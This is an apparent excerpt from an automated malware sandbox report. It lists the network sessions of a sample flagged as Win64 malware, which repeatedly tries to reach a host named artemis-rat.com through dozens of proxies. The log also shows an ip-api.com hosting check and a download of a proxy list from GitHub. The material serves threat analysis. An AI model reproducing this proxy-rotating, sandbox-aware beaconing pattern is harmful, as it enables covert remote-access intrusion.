                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.362535954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366517067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.460064888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:53.460083008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1841192.168.2.45282158.253.210.12288887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.332552910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366555929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1842192.168.2.452698203.160.186.24680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.342242002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.209573984 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1843192.168.2.452861181.78.11.2179997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.346594095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.511094093 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1844192.168.2.452953190.94.212.1259997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.346702099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.602046013 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1845192.168.2.45279385.172.0.3080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.347012997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.874183893 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1846192.168.2.455104142.54.231.3841457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.350728035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1847192.168.2.452857161.156.199.78807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.365093946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366647005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366463900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.366296053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.928772926 CET75INHTTP/1.0 200 Connection Established
                                              Proxy-agent: Apache/2.4.6 (CentOS)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1848192.168.2.45294894.23.220.136252567284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.365917921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366584063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366466999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.366403103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1849192.168.2.452902104.248.151.220639977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.367275000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1850192.168.2.452970202.57.2.19807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.381314993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569547892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.321758986 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1851192.168.2.45296191.134.140.160515137284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.381990910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866518974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366771936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.358824968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366456985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.163326979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.708425045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1852192.168.2.45297636.64.86.2731257284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.382167101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.499041080 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1853192.168.2.453120207.244.229.3479767284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.424803019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569550991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.602380037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.663141966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:53.663173914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:05.835328102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:17.835045099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:41.835074902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1854192.168.2.45313692.204.136.149169287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.433317900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569575071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.569751978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.585027933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:53.663197994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:17.663199902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:05.663146019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1855192.168.2.455267194.4.50.62123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.457056046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1856192.168.2.45526847.245.56.108181817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.459011078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569581985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.602436066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1857192.168.2.45522298.181.137.8341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.499057055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1858192.168.2.45325750.63.12.33238597284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.499620914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569648027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.569751978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.585027933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:53.663197994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:05.756922007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:17.772568941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:41.819464922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:29.835000038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1859192.168.2.45412067.201.33.10252837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:29.499850988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1860192.168.2.455289208.95.112.18043772C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:30.104130030 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                              Host: ip-api.com
                                              Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.265213966 CET175INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:29 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 6
                                              Access-Control-Allow-Origin: *
                                              X-Ttl: 60
                                              X-Rl: 44
                                              Data Raw: 66 61 6c 73 65 0a
                                              Data Ascii: false


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1861192.168.2.452660158.69.53.9893007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:43.156162024 CET132INHTTP/1.1 503 Too many open connections
                                              Content-Type: text/plain
                                              Connection: close
                                              Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                              Data Ascii: Maximum number of open connections reached.


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449731140.82.112.44437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              2024-03-11 07:37:15 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                              Host: github.com
                                              Connection: Keep-Alive
                                              2024-03-11 07:37:15 UTC506INHTTP/1.1 200 OK
                                              Server: GitHub.com
                                              Date: Mon, 11 Mar 2024 07:37:15 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                              ETag: W/"ca22d5b8b9ad48ae6a7b724c0c255e90"
                                              Cache-Control: max-age=0, private, must-revalidate
                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                              X-Frame-Options: deny
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 0
                                              Referrer-Policy: no-referrer-when-downgrade
                                              2024-03-11 07:37:15 UTC3599INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
